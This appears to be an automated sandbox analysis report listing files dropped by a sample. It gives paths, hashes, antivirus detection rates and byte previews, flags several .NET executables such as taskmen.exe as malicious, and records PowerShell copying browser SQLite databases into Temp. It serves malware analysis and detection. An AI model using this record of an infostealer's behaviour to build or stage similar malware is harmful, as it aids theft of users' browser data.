                                                                                      SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                      SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                      SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5829
                                                                                      Entropy (8bit):4.901113710259376
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                      MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                      SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                      SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                      SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):0.34726597513537405
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Nlll:Nll
                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:@...e...........................................................

                                                                                      C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\Client.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):463360
                                                                                      Entropy (8bit):7.5950208702429896
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:jCzQTYz4iqlcVgmItDwnBPRS4e7sKtj6f3Fjgf2RtDn6prNP75Jzdjx:28TYz4aXQj473Fj1D6Tzd
                                                                                      MD5:A4E804239AE09E3A23A4020C226B188C
                                                                                      SHA1:577169AACE1DE8A58549E8D2144238756DE0C22E
                                                                                      SHA-256:854B910EF8132D02B501360793F50DBB3F522B31C69FEFE3222EBEBA5E5A4DD1
                                                                                      SHA-512:B4BC862DAC9113B18FE9292C28D5C5F532F6316759F06A4910C1FE96E69DB692FDED455A94B1F41E5B4FFC43C01602E5655CE9220036A9DEB05D60871CF94EED
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 75%
                                                                                      • Antivirus: Virustotal, Detection: 55%, Browse
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ML.f................................. ........@.. .......................@..................................................(............................ ..........................................................................H............text...T.... ...................... ..`.Z`q....w........................... ..`.![@................................@....p0O................................ ..`.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ns5icvu.rdb.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1siscllo.gpn.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mbqzbxn.v4b.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3jdli3f.amy.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2dfd1vx.34f.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ciynii5t.ya5.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gc1tqaea.dcg.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mom50tk2.wzb.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrckxfwg.qno.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhtu3yos.r1a.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\ch1pl1en.gh2

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1006080
                                                                                      Entropy (8bit):7.86899484111889
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:+4yj0Z3aVJn8XkCd8Vm/43luAOagSkkbkMaABXWQ8rzMnZ7rZ2HX/vq9fELsDq7g:+4yj0Z3GJhYwlurxSH6QnZxneLS2WF
                                                                                      MD5:EFA5846830C8A002235AC1768295C1B9
                                                                                      SHA1:9822CB1A27AC6B7B74653619E1134EC7817A0959
                                                                                      SHA-256:3E9933AF0D5EA0F16393BFFC0D6E3EE95E7F5B84064F29BEDEB8F01D0B89E349
                                                                                      SHA-512:A2009A97D28C7BA9B39C2BA196C3A97A66E56458D34E9C39EB2ADB00C246C41849B74EAF9E1DD2CDEB01DCE64AC00BB13FA560185BE41EF0602F9F922DF87DF6
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X_h..........."...0.................. ........@.. ....................... #...........`....................................(.....".......................#......................................................................!.H............text...T.... ...................... ..`.BYK................................ ..`.7'g................................@....{a".....8.......:.................. ..`.rsrc........."......@..............@..@.reloc........#......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\places.raw

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):5242880
                                                                                      Entropy (8bit):0.03859996294213402
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\taskmen.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\Winscreen.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1006080
                                                                                      Entropy (8bit):7.86899484111889
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:+4yj0Z3aVJn8XkCd8Vm/43luAOagSkkbkMaABXWQ8rzMnZ7rZ2HX/vq9fELsDq7g:+4yj0Z3GJhYwlurxSH6QnZxneLS2WF
                                                                                      MD5:EFA5846830C8A002235AC1768295C1B9
                                                                                      SHA1:9822CB1A27AC6B7B74653619E1134EC7817A0959
                                                                                      SHA-256:3E9933AF0D5EA0F16393BFFC0D6E3EE95E7F5B84064F29BEDEB8F01D0B89E349
                                                                                      SHA-512:A2009A97D28C7BA9B39C2BA196C3A97A66E56458D34E9C39EB2ADB00C246C41849B74EAF9E1DD2CDEB01DCE64AC00BB13FA560185BE41EF0602F9F922DF87DF6
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X_h..........."...0.................. ........@.. ....................... #...........`....................................(.....".......................#......................................................................!.H............text...T.... ...................... ..`.BYK................................ ..`.7'g................................@....{a".....8.......:.................. ..`.rsrc........."......@..............@..@.reloc........#......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpAA6A.tmp.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpAA8B.tmp.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpAA8C.tmp.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):159744
                                                                                      Entropy (8bit):0.5394293526345721
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpAA9C.tmp.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):159744
                                                                                      Entropy (8bit):0.5394293526345721
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpAAAD.tmp.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpAACD.tmp.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.121297215059106
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpAADE.tmp.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.121297215059106
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpAAEE.tmp.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):51200
                                                                                      Entropy (8bit):0.8746135976761988
                                                                                      Encrypted:false
